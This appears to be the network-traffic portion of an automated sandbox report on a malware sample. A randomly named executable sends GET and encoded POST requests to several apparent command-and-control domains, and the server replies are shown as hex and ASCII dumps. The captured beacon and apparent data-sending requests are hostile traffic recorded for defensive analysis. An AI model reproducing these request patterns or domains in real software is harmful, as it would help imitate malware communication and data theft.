                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.332890034 CET1.1.1.1192.168.2.40x8974No error (0)www.seamarket.shop52.223.13.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.332914114 CET1.1.1.1192.168.2.40x8974No error (0)www.seamarket.shop52.223.13.41A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                              • www.techforcreators.live
                                                                                                                                                                                                                                              • www.llmsforrobot.xyz
                                                                                                                                                                                                                                              • www.yous.website
                                                                                                                                                                                                                                              • www.mirenzhibo.net
                                                                                                                                                                                                                                              • www.sob.rip
                                                                                                                                                                                                                                              • www.aihuzhibo.net
                                                                                                                                                                                                                                              • www.furrcali.xyz
                                                                                                                                                                                                                                              • www.accusolution.pro
                                                                                                                                                                                                                                              • www.seamarket.shop

                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.44973652.223.13.41804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:05.062185049 CET431OUTGET /7hkm/?4v7=PTrvXdcgSMfdhotioq8pnUkjNlxy61myV8F0WPH7Z2Bq/45rtMPjYLxLqkAieyptPF2XeHF9OCzJ15KQyhm6FHL/8EngdtV8gwYC3BL3/d+rtru4um4WJso=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.techforcreators.live
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:06.153362036 CET370INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:08:05 GMT
                                                                                                                                                                                                                                              content-length: 249
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 76 37 3d 50 54 72 76 58 64 63 67 53 4d 66 64 68 6f 74 69 6f 71 38 70 6e 55 6b 6a 4e 6c 78 79 36 31 6d 79 56 38 46 30 57 50 48 37 5a 32 42 71 2f 34 35 72 74 4d 50 6a 59 4c 78 4c 71 6b 41 69 65 79 70 74 50 46 32 58 65 48 46 39 4f 43 7a 4a 31 35 4b 51 79 68 6d 36 46 48 4c 2f 38 45 6e 67 64 74 56 38 67 77 59 43 33 42 4c 33 2f 64 2b 72 74 72 75 34 75 6d 34 57 4a 73 6f 3d 26 70 52 65 6c 3d 63 68 4e 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4v7=PTrvXdcgSMfdhotioq8pnUkjNlxy61myV8F0WPH7Z2Bq/45rtMPjYLxLqkAieyptPF2XeHF9OCzJ15KQyhm6FHL/8EngdtV8gwYC3BL3/d+rtru4um4WJso=&pRel=chN0"}</script></head></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.449754192.30.252.154804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.389950037 CET701OUTPOST /033w/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Referer: http://www.llmsforrobot.xyz/033w/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 70 62 58 34 54 48 5a 46 7a 2f 6e 66 48 58 74 72 35 56 6c 54 72 30 34 43 46 39 70 78 4e 63 49 46 42 76 56 35 54 45 79 4f 35 45 6c 70 79 52 37 49 44 6b 39 30 79 34 69 75 41 32 50 54 6b 58 76 61 34 46 78 6d 36 2f 42 44 47 44 43 6e 35 69 61 75 79 51 61 32 75 67 57 49 4a 30 44 42 57 74 61 70 46 44 6f 64 56 4b 54 64 57 2b 67 4b 4b 6c 4a 6f 2b 45 7a 6c 67 76 6f 41 47 52 70 73 5a 41 46 48 34 51 32 6f 70 64 67 48 38 6e 48 79 55 37 37 6c 58 70 38 46 37 38 47 32 47 65 36 69 70 34 48 6f 69 7a 41 6b 35 77 79 6d 4e 49 42 74 6f 6a 30 32 67 44 30 44 4c 56 68 77 36 4d 66 69 31 47 54 2b 68 77 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=pbX4THZFz/nfHXtr5VlTr04CF9pxNcIFBvV5TEyO5ElpyR7IDk90y4iuA2PTkXva4Fxm6/BDGDCn5iauyQa2ugWIJ0DBWtapFDodVKTdW+gKKlJo+EzlgvoAGRpsZAFH4Q2opdgH8nHyU77lXp8F78G2Ge6ip4HoizAk5wymNIBtoj02gD0DLVhw6Mfi1GT+hw==
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474469900 CET1236INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 6e 69 63 6f 72 6e 21 20 26 6d 69 64 64 6f 74 3b 20 47 69 74 48 75 62 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head> <title>Unicorn! &middot; GitHub</title> <style type="text/css" media="screen"> body { background-color: #f1f1f1; margin: 0; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; } .container { margin: 50px auto 40px auto; width: 600px; text-align: center; } a { color: #4183c4; text-decoration: none; } a:hover { text-decoration: underline; } h1 { letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px; text-shadow: 0 1px 0 #fff; } p { color: rgba(0, 0, 0, 0.5); margin: 10px 0 10px; font-size: 18px; font-weight: 200; line-heig
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474647045 CET1236INData Raw: 68 74 3a 20 31 2e 36 65 6d 3b 7d 0d 0a 0d 0a 20 20 20 20 20 20 75 6c 20 7b 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 6c
                                                                                                                                                                                                                                              Data Ascii: ht: 1.6em;} ul { list-style: none; margin: 25px 0; padding: 0; } li { display: table-cell; font-weight: bold; width: 1%; } .logo { display: inline-block; margin-top: 35px; } .logo-img-2x { display: none; }
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474664927 CET1236INData Raw: 44 2b 4b 41 44 36 41 78 43 4e 71 77 6f 58 31 5a 69 61 77 6f 39 4c 59 6e 47 75 77 68 4c 37 61 69 77 61 49 79 59 75 64 73 74 36 44 6c 72 6e 68 63 57 76 43 63 56 76 6c 62 45 39 50 76 73 4c 32 75 33 75 59 6d 64 43 5a 75 6d 39 52 6e 73 37 63 6c 55 59
                                                                                                                                                                                                                                              Data Ascii: D+KAD6AxCNqwoX1Ziawo9LYnGuwhL7aiwaIyYudst6DlrnhcWvCcVvlbE9PvsL2u3uYmdCZum9Rns7clUYsreOYp2nuj37kiZLUfqhvxafqfmrNWEjA22uz1Vu6lsiRAArWhLfgdoONnF36rWrzpz/ajy/LbqR8pdWDVXx8faN6m0+6hE3+1pmHP2mTy1b4k1p/ueFlj7vMfzyBs1v/2GfLpFL5rQD+7teQABj4n0/rpCz6r1Z8
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474680901 CET1236INData Raw: 7a 51 67 34 4a 48 4b 6d 43 66 74 42 79 42 2f 48 38 6f 30 67 59 63 2f 35 49 6e 2f 41 63 68 6a 4b 54 4d 7a 31 75 59 78 4c 38 33 76 6c 78 68 4c 2f 77 48 49 59 2f 48 41 4c 62 59 34 4d 68 49 43 6a 44 48 2f 4d 30 39 74 47 51 49 67 30 34 67 6a 49 77 30
                                                                                                                                                                                                                                              Data Ascii: zQg4JHKmCftByB/H8o0gYc/5In/AchjKTMz1uYxL83vlxhL/wHIY/HALbY4MhICjDH/M09tGQIg04gjIw0HzhQ7HJlpIY+kuCVPwlNrIAAynUQSslNxFwvXB6xzU2YF/JJTYu7A0xvTpxnInIAnLoMi8RPIZOKRKD1tJnDITrPVEfLP+QHI4/WcMmf5A+ZUHNMngQFlpCRIwOF2SOb1FZJ/5twfgDx2TR3ye2bj0eOwEDAy01MS
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474697113 CET1236INData Raw: 55 34 72 42 55 2b 71 4b 56 67 69 76 59 5a 33 65 47 55 46 63 44 77 4b 44 37 74 56 41 67 36 5a 51 67 32 4a 50 79 63 65 37 61 78 59 6e 32 39 46 4e 65 2f 6d 33 73 75 63 6c 4a 77 79 4a 77 4f 32 45 69 56 6b 31 34 6e 6b 4a 4f 6d 66 4d 57 31 41 5a 67 66
                                                                                                                                                                                                                                              Data Ascii: U4rBU+qKVgivYZ3eGUFcDwKD7tVAg6ZQg2JPyce7axYn29FNe/m3suclJwyJwO2EiVk14nkJOmfMW1AZgf8ocS0dEIyHZUIB8L2b91PcV2hxrmJv5L+jAcZmCPE1o89Eg6o0mzBj0eHGsEFUCoZvJfT6UXu5Q/NSkpOS0mdk56eQUqfk4oWALJranb6zXOnEUjIT9mhFJf6/TsuHHYGuQkIEdnEhImQfZjBQ3GaKxsfFQdKQgt+
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474714994 CET1236INData Raw: 52 36 58 37 39 70 37 6f 53 74 58 4f 6a 70 4f 46 79 4d 50 4a 72 57 33 34 31 55 56 52 69 4f 6e 63 66 6e 79 61 71 76 67 49 58 6d 53 49 30 61 47 76 35 75 65 33 4c 70 6d 30 47 39 41 65 61 5a 49 62 4b 4f 74 6f 41 74 49 53 71 2f 41 53 4a 6a 62 48 30 69
                                                                                                                                                                                                                                              Data Ascii: R6X79p7oStXOjpOFyMPJrW341UVRiOncfnyaqvgIXmSI0aGv5ue3Lpm0G9AeaZIbKOtoAtISq/ASJjbH0iKSXA3PRSIIoAc21q1EomvU3NY9tZj9ZHNEU7L0tjPDQbfar0VHFeoVkfSXFvbvnNcRcKhgMrp06cuXqQVYA6jkf4I12IMaTMuf3JaMjQ7LX5Ohuk7M8ESzpOupMzQFopkybnRdrm87c69e+XNRU4qkGJjJCbTg4Eo
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474731922 CET1236INData Raw: 51 7a 6b 5a 4e 53 51 7a 33 44 50 4f 37 63 50 66 64 54 69 59 73 68 34 51 61 54 34 43 6e 38 46 63 65 51 55 74 6a 41 42 42 35 2b 71 45 31 6c 56 49 33 32 50 4f 2f 67 77 41 57 56 31 6b 51 55 2b 4b 73 67 71 46 37 64 72 34 59 58 76 6f 71 6b 73 4c 72 4c
                                                                                                                                                                                                                                              Data Ascii: QzkZNSQz3DPO7cPfdTiYsh4QaT4Cn8FceQUtjABB5+qE1lVI32PO/gwAWV1kQU+KsgqF7dr4YXvoqksLrLCUshQ/AGE+cS4NAypAoKhzIzU2bM8yOAZH4+IERAK7JT9Vjc1NbV3tN1D/tvWa8s7EHR6Kd16nMLdJHxhaJKGNjUJ0OolGPTVNx5I/Vd2JFo5/eGVukxA7t749KPrLuYgIlfs3G+dIgHJzmIDSCO9BEcFFFEqW1zp
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474841118 CET1236INData Raw: 4f 45 56 71 6c 53 77 54 53 4c 67 4f 46 49 54 78 4e 72 61 6e 42 67 44 4d 58 45 69 33 47 76 56 35 4b 32 75 70 62 34 57 6e 47 59 51 33 37 4c 35 65 59 36 67 30 32 30 55 37 6f 38 2b 56 65 4c 6d 73 33 41 4d 37 69 34 69 58 6a 45 6a 78 59 4a 51 46 39 6f
                                                                                                                                                                                                                                              Data Ascii: OEVqlSwTSLgOFITxNranBgDMXEi3GvV5K2upb4WnGYQ37L5eY6g020U7o8+VeLms3AM7i4iXjEjxYJQF9o7j00GBKqUCEiLCmT0m2sHkWqhN/xcB5EYO63viYi9385pPDCslAGGKmKh62KZrg1cZCiiBUZbNA78nhWSmztmU0yBCBuhOCJL1E/AQD8LSohi1SUdtpLKoFeW1Jrk0adK4OktzGvUIkbzTGaWcTxQF9bvBxCnFD0+
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474857092 CET1236INData Raw: 32 42 4e 6a 6f 78 30 54 4c 76 74 72 2b 70 66 43 79 41 57 76 37 53 4f 4c 39 31 47 4a 56 6c 2b 5a 4c 7a 33 33 68 34 36 34 44 74 6b 41 49 48 54 47 6d 46 65 31 55 53 4b 79 57 4e 46 49 59 6d 43 6b 76 76 31 70 61 38 76 35 5a 4c 42 6e 44 70 64 56 6c 64
                                                                                                                                                                                                                                              Data Ascii: 2BNjox0TLvtr+pfCyAWv7SOL91GJVl+ZLz33h464DtkAIHTGmFe1USKyWNFIYmCkvv1pa8v5ZLBnDpdVld30Yj1ZYARIc1ScAcYCwHBinMYUFepS4xeRViH7rGmCAhsBEU2OQPJCSJNtnJqxV8sKC8tLT9la7aQz3y4kdBQiTjyFNUpBzFp3hABXeDgewEEVQiZkoMDWWuPOgX9wNAb9/44dKDlk9s6EGRafyGnpZCJFI/RpA+2
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474872112 CET1236INData Raw: 59 53 69 52 46 62 49 68 34 48 49 68 46 42 65 67 73 63 53 51 49 36 74 6a 47 79 63 55 4a 4a 31 72 2b 32 6a 55 4d 2b 62 45 55 42 75 48 45 4c 53 51 2b 56 36 37 78 58 61 4a 70 54 4f 35 49 72 67 51 53 57 47 65 48 53 4f 61 73 52 7a 68 58 69 45 38 6a 31
                                                                                                                                                                                                                                              Data Ascii: YSiRFbIh4HIhFBegscSQI6tjGycUJJ1r+2jUM+bEUBuHELSQ+V67xXaJpTO5IrgQSWGeHSOasRzhXiE8j1aQIBZKInVLMRjVWhhqVQcYCLMJJREA4VTDESE9uQAg9wK3hBiUGOj7Thw8KEU0W7UjMQUZSAKs/SR0DpBMYkb8IFQp3qLYrIZ0UUA6YwAsh5A3kYVdDArEgiIvHnCRcUhaEzCpCMcyml6r5/WeIBI4RVYCgyFbxHC
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.594496012 CET1236INData Raw: 53 44 5a 41 43 61 52 57 42 59 75 4e 4d 79 6c 62 69 6c 34 6b 46 5a 64 45 4e 6f 42 4b 50 42 66 45 44 63 53 6a 4a 30 51 6b 54 69 38 48 36 63 59 69 4e 48 39 42 5a 47 4e 52 49 52 63 56 6f 6d 74 74 37 79 38 76 4c 65 32 61 61 4f 58 65 5a 30 53 68 6f 31
                                                                                                                                                                                                                                              Data Ascii: SDZACaRWBYuNMylbil4kFZdENoBKPBfEDcSjJ0QkTi8H6cYiNH9BZGNRIRcVomtt7y8vLe2aaOXeZ0Sho1hs3wGQjtrkb3YysWTXvFdn2CicdmEJNjQpi3inoD8T31kJwtlCIi82SMP05JhdFgfRstXJzA5FXTfoSvQWfThDW24XKh7sIkEG1kqsrAdFwyteXn5ecEEOwyeEJFkIjKlQIz0V3IGHUSkqbb8Dpq/aP2i92uVnLgU


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              2192.168.2.449760192.30.252.154804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.051013947 CET721OUTPOST /033w/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.llmsforrobot.xyz
                                                                                                                                                                                                                                              Referer: http://www.llmsforrobot.xyz/033w/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 70 62 58 34 54 48 5a 46 7a 2f 6e 66 47 7a 52 72 37 79 4a 54 74 55 34 46 4a 64 70 78 48 38 49 42 42 76 70 35 54 46 6d 67 35 32 52 70 33 41 4c 49 43 67 70 30 6e 34 69 75 55 6d 4f 58 71 33 76 72 34 46 74 45 36 2b 39 44 47 48 71 6e 35 67 79 75 79 6a 79 78 76 77 57 47 46 55 44 48 62 4e 61 70 46 44 6f 64 56 4b 58 7a 57 2b 59 4b 4c 56 5a 6f 73 31 7a 69 70 50 6f 42 4d 78 70 73 64 41 46 44 34 51 32 57 70 63 38 70 38 6c 2f 79 55 36 4c 6c 55 39 49 47 31 38 47 77 4c 2b 36 79 67 49 47 78 36 52 52 71 30 51 61 32 43 6f 5a 39 6b 46 35 73 78 79 56 55 5a 56 46 44 6e 4c 57 57 34 46 75 33 36 30 6b 78 48 6d 45 44 48 64 67 45 6d 76 4d 56 66 35 72 44 2f 6e 4d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=pbX4THZFz/nfGzRr7yJTtU4FJdpxH8IBBvp5TFmg52Rp3ALICgp0n4iuUmOXq3vr4FtE6+9DGHqn5gyuyjyxvwWGFUDHbNapFDodVKXzW+YKLVZos1zipPoBMxpsdAFD4Q2Wpc8p8l/yU6LlU9IG18GwL+6ygIGx6RRq0Qa2CoZ9kF5sxyVUZVFDnLWW4Fu360kxHmEDHdgEmvMVf5rD/nM=
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138079882 CET1236INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 0d 0a 0d 0a 48 65 6c 6c 6f 20 66 75 74 75 72 65 20 47 69 74 48 75 62 62 65 72 21 20 49 20 62 65 74 20 79 6f 75 27 72 65 20 68 65 72 65 20 74 6f 20 72 65 6d 6f 76 65 20 74 68 6f 73 65 20 6e 61 73 74 79 20 69 6e 6c 69 6e 65 20 73 74 79 6c 65 73 2c 0d 0a 44 52 59 20 75 70 20 74 68 65 73 65 20 74 65 6d 70 6c 61 74 65 73 20 61 6e 64 20 6d 61 6b 65 20 27 65 6d 20 6e 69 63 65 20 61 6e 64 20 72 65 2d 75 73 61 62 6c 65 2c 20 72 69 67 68 74 3f 0d 0a 0d 0a 50 6c 65 61 73 65 2c 20 64 6f 6e 27 74 2e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 79 6c 65 67 75 69 64 65 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2e 30 0d 0a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 6e 69 63 6f 72 6e 21 20 26 6d 69 64 64 6f 74 3b 20 47 69 74 48 75 62 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...Hello future GitHubber! I bet you're here to remove those nasty inline styles,DRY up these templates and make 'em nice and re-usable, right?Please, don't. https://github.com/styleguide/templates/2.0--><html> <head> <title>Unicorn! &middot; GitHub</title> <style type="text/css" media="screen"> body { background-color: #f1f1f1; margin: 0; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; } .container { margin: 50px auto 40px auto; width: 600px; text-align: center; } a { color: #4183c4; text-decoration: none; } a:hover { text-decoration: underline; } h1 { letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px; text-shadow: 0 1px 0 #fff; } p { color: rgba(0, 0, 0, 0.5); margin: 10px 0 10px; font-size: 18px; font-weight: 200; line-heig
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138154984 CET1236INData Raw: 68 74 3a 20 31 2e 36 65 6d 3b 7d 0d 0a 0d 0a 20 20 20 20 20 20 75 6c 20 7b 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 6c
                                                                                                                                                                                                                                              Data Ascii: ht: 1.6em;} ul { list-style: none; margin: 25px 0; padding: 0; } li { display: table-cell; font-weight: bold; width: 1%; } .logo { display: inline-block; margin-top: 35px; } .logo-img-2x { display: none; }
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138209105 CET1236INData Raw: 44 2b 4b 41 44 36 41 78 43 4e 71 77 6f 58 31 5a 69 61 77 6f 39 4c 59 6e 47 75 77 68 4c 37 61 69 77 61 49 79 59 75 64 73 74 36 44 6c 72 6e 68 63 57 76 43 63 56 76 6c 62 45 39 50 76 73 4c 32 75 33 75 59 6d 64 43 5a 75 6d 39 52 6e 73 37 63 6c 55 59
                                                                                                                                                                                                                                              Data Ascii: D+KAD6AxCNqwoX1Ziawo9LYnGuwhL7aiwaIyYudst6DlrnhcWvCcVvlbE9PvsL2u3uYmdCZum9Rns7clUYsreOYp2nuj37kiZLUfqhvxafqfmrNWEjA22uz1Vu6lsiRAArWhLfgdoONnF36rWrzpz/ajy/LbqR8pdWDVXx8faN6m0+6hE3+1pmHP2mTy1b4k1p/ueFlj7vMfzyBs1v/2GfLpFL5rQD+7teQABj4n0/rpCz6r1Z8
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138242960 CET1236INData Raw: 7a 51 67 34 4a 48 4b 6d 43 66 74 42 79 42 2f 48 38 6f 30 67 59 63 2f 35 49 6e 2f 41 63 68 6a 4b 54 4d 7a 31 75 59 78 4c 38 33 76 6c 78 68 4c 2f 77 48 49 59 2f 48 41 4c 62 59 34 4d 68 49 43 6a 44 48 2f 4d 30 39 74 47 51 49 67 30 34 67 6a 49 77 30
                                                                                                                                                                                                                                              Data Ascii: zQg4JHKmCftByB/H8o0gYc/5In/AchjKTMz1uYxL83vlxhL/wHIY/HALbY4MhICjDH/M09tGQIg04gjIw0HzhQ7HJlpIY+kuCVPwlNrIAAynUQSslNxFwvXB6xzU2YF/JJTYu7A0xvTpxnInIAnLoMi8RPIZOKRKD1tJnDITrPVEfLP+QHI4/WcMmf5A+ZUHNMngQFlpCRIwOF2SOb1FZJ/5twfgDx2TR3ye2bj0eOwEDAy01MS
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138298988 CET1236INData Raw: 55 34 72 42 55 2b 71 4b 56 67 69 76 59 5a 33 65 47 55 46 63 44 77 4b 44 37 74 56 41 67 36 5a 51 67 32 4a 50 79 63 65 37 61 78 59 6e 32 39 46 4e 65 2f 6d 33 73 75 63 6c 4a 77 79 4a 77 4f 32 45 69 56 6b 31 34 6e 6b 4a 4f 6d 66 4d 57 31 41 5a 67 66
                                                                                                                                                                                                                                              Data Ascii: U4rBU+qKVgivYZ3eGUFcDwKD7tVAg6ZQg2JPyce7axYn29FNe/m3suclJwyJwO2EiVk14nkJOmfMW1AZgf8ocS0dEIyHZUIB8L2b91PcV2hxrmJv5L+jAcZmCPE1o89Eg6o0mzBj0eHGsEFUCoZvJfT6UXu5Q/NSkpOS0mdk56eQUqfk4oWALJranb6zXOnEUjIT9mhFJf6/TsuHHYGuQkIEdnEhImQfZjBQ3GaKxsfFQdKQgt+
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138334036 CET1236INData Raw: 52 36 58 37 39 70 37 6f 53 74 58 4f 6a 70 4f 46 79 4d 50 4a 72 57 33 34 31 55 56 52 69 4f 6e 63 66 6e 79 61 71 76 67 49 58 6d 53 49 30 61 47 76 35 75 65 33 4c 70 6d 30 47 39 41 65 61 5a 49 62 4b 4f 74 6f 41 74 49 53 71 2f 41 53 4a 6a 62 48 30 69
                                                                                                                                                                                                                                              Data Ascii: R6X79p7oStXOjpOFyMPJrW341UVRiOncfnyaqvgIXmSI0aGv5ue3Lpm0G9AeaZIbKOtoAtISq/ASJjbH0iKSXA3PRSIIoAc21q1EomvU3NY9tZj9ZHNEU7L0tjPDQbfar0VHFeoVkfSXFvbvnNcRcKhgMrp06cuXqQVYA6jkf4I12IMaTMuf3JaMjQ7LX5Ohuk7M8ESzpOupMzQFopkybnRdrm87c69e+XNRU4qkGJjJCbTg4Eo
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138369083 CET1236INData Raw: 51 7a 6b 5a 4e 53 51 7a 33 44 50 4f 37 63 50 66 64 54 69 59 73 68 34 51 61 54 34 43 6e 38 46 63 65 51 55 74 6a 41 42 42 35 2b 71 45 31 6c 56 49 33 32 50 4f 2f 67 77 41 57 56 31 6b 51 55 2b 4b 73 67 71 46 37 64 72 34 59 58 76 6f 71 6b 73 4c 72 4c
